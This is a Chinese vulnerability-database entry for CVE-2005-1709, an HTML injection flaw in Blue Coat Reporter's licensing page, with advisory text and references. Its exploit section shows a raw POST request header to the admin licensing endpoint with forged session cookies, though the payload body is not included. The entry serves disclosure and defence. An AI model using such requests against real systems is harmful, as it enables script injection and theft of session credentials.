Blue Coat Reporter License HTML注入漏洞

Blue Coat Reporter License HTML注入漏洞

漏洞ID 1108805 漏洞类型 输入验证
发布时间 2005-05-24 更新时间 2005-10-20
图片[1]-Blue Coat Reporter License HTML注入漏洞-安全小百科CVE编号 CVE-2005-1709
图片[2]-Blue Coat Reporter License HTML注入漏洞-安全小百科CNNVD-ID CNNVD-200505-1177
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25698
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1177
|漏洞详情
BlueCoatReporter的7.1.2之前版本存在未知漏洞,远程未验证攻击者可以借此添加授权许可。
|漏洞EXP
source: http://www.securityfocus.com/bid/13725/info

Blue Coat Reporter is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

The vendor has addressed this issue in the upcoming version 7.1.2 of the application; earlier versions are reported vulnerable. 

POST
/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://www.example.com:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com:8987
Pragma: no-cache
Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid
Content-Length: 100
|参考资料

来源:VUPEN
名称:ADV-2005-0589
链接:http://www.frsirt.com/english/advisories/2005/0589
来源:www.bluecoat.com
链接:http://www.bluecoat.com/support/knowledge/advisory_reporter_711_vulnerabilities.html
来源:BID
名称:13725
链接:http://www.securityfocus.com/bid/13725
来源:OSVDB
名称:16764
链接:http://www.osvdb.org/16764
来源:SECUNIA
名称:15452
链接:http://secunia.com/advisories/15452

相关推荐: Compaq Management Agents Web File Access Vulnerability

Compaq Management Agents Web File Access Vulnerability 漏洞ID 1104786 漏洞类型 Access Validation Error 发布时间 1999-05-25 更新时间 1999-05-25 C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享